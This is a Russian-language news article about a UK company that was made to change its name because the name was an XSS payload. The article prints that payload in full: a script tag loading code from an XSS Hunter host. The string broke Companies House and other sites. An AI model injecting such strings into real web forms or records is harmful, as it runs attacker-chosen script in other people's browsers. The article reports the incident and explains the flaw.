Британскую компанию заставили сменить название — оно провоцировало атаки на сайты

Регистрационная палата Великобритании обязала одну из местных компаний провести ребрендинг, потому что её наименование ставило под угрозу безопасность некоторых сайтов, включая ресурс самого учреждения, сообщает The Guardian.

Оставить комментарий
Британскую компанию заставили сменить название — оно провоцировало атаки на сайты

Регистрационная палата Великобритании обязала одну из местных компаний провести ребрендинг, потому что её наименование ставило под угрозу безопасность некоторых сайтов, включая ресурс самого учреждения, сообщает The Guardian.

Консалтинговую компанию «“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD» основал британский разработчик — название казалось ему забавным и, как он думал, будет способствовать развитию бизнеса.

Позже было установлено, что имя делало сайт Регистрационной палаты уязвимым к XSS-атакам (межсайтовый скриптинг). В ходе таких атак хакеры могут внедрять в веб-страницы вредоносный код, выполняющийся на пользовательском устройстве при открытии страницы.

Сайты, которые некорректно обрабатывают HTML-код, из-за первых двух символов “ и > названия по ошибке считали его пустым. Далее они загружали и выполняли скрипт с платформы XSS Hunter, которая помогает разработчикам искать XSS-уязвимости.

Скрипт выводил безобидное уведомление. Но сама возможность его появления говорит о том, ошибку могут эксплуатировать киберпреступники, чтобы нанести более серьёзный ущерб.

По словам основателя компании, пожелавшего остаться анонимным, кавычки и угловые скобки допускаются нормами агентства и встречаются в других шутливых наименованиях компаний. Поэтому он думал, что его название не станет проблемой, а агентство предприняло меры для предотвращения подобных инцидентов.

Компания уже получила новое имя: теперь она называется «THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD» (Компания, в названии которой были HTML-теги).

Подписывайтесь на «Что к чему» —
анамнез и главные симптомы беларуского ИТ.
Цифры, графика, ничего лишнего. Выходит раз в 2 недели.
Спасибо! На указанный адрес отправлено письмо для подтверждения подписки.
Читайте также
Компания ввела 4-дневку — число соискателей выросло в 1,5 раза, другие показатели в плюсе
Компания ввела 4-дневку — число соискателей выросло в 1,5 раза, другие показатели в плюсе
Компания ввела 4-дневку — число соискателей выросло в 1,5 раза, другие показатели в плюсе
«Полная обдираловка»: британские пользователи подали иск против Sony из-за завышенных цен в PlayStation Store
«Полная обдираловка»: британские пользователи подали иск против Sony из-за завышенных цен в PlayStation Store
«Полная обдираловка»: британские пользователи подали иск против Sony из-за завышенных цен в PlayStation Store
Последствия локдауна стали убивать больше людей, чем коронавирус
Последствия локдауна стали убивать больше людей, чем коронавирус
Последствия локдауна стали убивать больше людей, чем коронавирус
1 комментарий
В Великобритании из-за дата-центров могут запретить строить дома на 10 лет
В Великобритании из-за дата-центров могут запретить строить дома на 10 лет
В Великобритании из-за дата-центров могут запретить строить дома на 10 лет

Хотите сообщить важную новость? Пишите в Telegram-бот

Главные события и полезные ссылки в нашем Telegram-канале

Обсуждение
Комментируйте без ограничений

Релоцировались? Теперь вы можете комментировать без верификации аккаунта.

Комментариев пока нет.